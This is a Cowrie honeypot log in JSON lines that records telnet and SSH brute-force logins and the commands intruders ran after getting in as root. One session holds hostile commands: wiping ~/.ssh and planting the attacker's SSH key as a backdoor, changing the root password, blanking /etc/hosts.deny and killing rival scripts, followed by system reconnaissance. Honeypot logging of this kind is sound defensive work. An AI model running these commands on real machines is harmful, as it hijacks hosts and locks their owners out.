{"eventid":"cowrie.session.connect","src_ip":"211.229.8.172","src_port":52398,"dst_ip":"1.2.3.4","dst_port":23,"session":"47bc7dae817d","protocol":"telnet","message":"New connection: 211.229.8.172:52398 (1.2.3.4:23) [session: 47bc7dae817d]","sensor":"my-vps","timestamp":"2025-08-26T15:12:43.808278Z"}
{"eventid":"cowrie.session.connect","src_ip":"210.99.64.84","src_port":48899,"dst_ip":"1.2.3.4","dst_port":23,"session":"bcac7ab9996a","protocol":"telnet","message":"New connection: 210.99.64.84:48899 (1.2.3.4:23) [session: bcac7ab9996a]","sensor":"my-vps","timestamp":"2025-08-26T15:13:01.789711Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52934,"dst_ip":"1.2.3.4","dst_port":22,"session":"a10af8c2ce29","protocol":"ssh","message":"New connection: 212.227.235.229:52934 (1.2.3.4:22) [session: a10af8c2ce29]","sensor":"my-vps","timestamp":"2025-08-26T15:13:05.320742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:13:05.322963Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:13:05.800418Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.login.success","username":"root","password":"qwert12345","message":"login attempt [root/qwert12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:13:07.753026Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:13:12.001277Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:13:12.002029Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T15:13:12.003422Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:12.478262Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:13:14.425329Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T15:13:14.426091Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.closed","duration":31.44438624382019,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:15.252577Z","src_ip":"211.229.8.172","session":"47bc7dae817d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T15:13:15.738297Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:15.739307Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41868,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dad9c77ebfc","protocol":"ssh","message":"New connection: 212.227.235.229:41868 (1.2.3.4:22) [session: 7dad9c77ebfc]","sensor":"my-vps","timestamp":"2025-08-26T15:13:16.212231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:13:16.213551Z","src_ip":"212.227.235.229","session":"7dad9c77ebfc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:13:17.843539Z","src_ip":"212.227.235.229","session":"7dad9c77ebfc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:18.952922Z","src_ip":"212.227.125.160","session":"e3536a6cdeb7"}
{"eventid":"cowrie.session.closed","duration":180.1496067047119,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:18.957839Z","src_ip":"212.227.125.160","session":"e3536a6cdeb7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T15:13:19.794585Z","src_ip":"212.227.235.229","session":"7dad9c77ebfc"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:21.273016Z","src_ip":"212.227.235.229","session":"7dad9c77ebfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36022,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9753ad527dc","protocol":"ssh","message":"New connection: 212.227.235.229:36022 (1.2.3.4:22) [session: d9753ad527dc]","sensor":"my-vps","timestamp":"2025-08-26T15:13:21.749096Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T15:13:21.749853Z","src_ip":"212.227.235.229","session":"d9753ad527dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T15:13:24.816477Z","src_ip":"212.227.235.229","session":"d9753ad527dc"}
{"eventid":"cowrie.session.closed","duration":30.45913577079773,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:32.248782Z","src_ip":"210.99.64.84","session":"bcac7ab9996a"}
{"eventid":"cowrie.session.closed","duration":"12.7","message":"Connection lost after 12.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:34.457962Z","src_ip":"212.227.235.229","session":"d9753ad527dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:13:34.988180Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T15:13:34.988960Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:36.240284Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:13:38.063237Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"echo \"root:T6is7WVvOHlg\"|chpasswd|bash","message":"CMD: echo \"root:T6is7WVvOHlg\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T15:13:38.063987Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7628df6621ed319a93951929569bba3b082f62fa9322ce1a6875f19c7f10373a","size":21,"shasum":"7628df6621ed319a93951929569bba3b082f62fa9322ce1a6875f19c7f10373a","duplicate":false,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/7628df6621ed319a93951929569bba3b082f62fa9322ce1a6875f19c7f10373a after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:39.280878Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:13:40.292458Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T15:13:40.293237Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T15:13:40.770035Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:40.770932Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:13:41.738335Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T15:13:41.739115Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:42.218114Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:13:44.679050Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T15:13:44.679730Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:45.156796Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:13:47.762375Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T15:13:47.763214Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T15:13:47.764099Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"7.9","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:13:55.708408Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37832,"dst_ip":"1.2.3.4","dst_port":22,"session":"1125077c41e3","protocol":"ssh","message":"New connection: 212.227.235.229:37832 (1.2.3.4:22) [session: 1125077c41e3]","sensor":"my-vps","timestamp":"2025-08-26T15:14:02.782085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:14:03.297369Z","src_ip":"212.227.235.229","session":"1125077c41e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:14:03.298567Z","src_ip":"212.227.235.229","session":"1125077c41e3"}
{"eventid":"cowrie.login.success","username":"root","password":"14312010","message":"login attempt [root/14312010] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:14:06.816637Z","src_ip":"212.227.235.229","session":"1125077c41e3"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:07.633210Z","src_ip":"212.227.235.229","session":"1125077c41e3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:11.084247Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T15:14:11.085184Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:11.566717Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:12.642703Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T15:14:12.643637Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:13.811400Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:14.826398Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T15:14:14.827136Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:15.303260Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:16.964554Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T15:14:16.965299Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:14:17.442976Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:14:20.204314Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T15:14:20.205186Z","src_ip":"212.227.235.229","session":"a10af8c2ce29"}
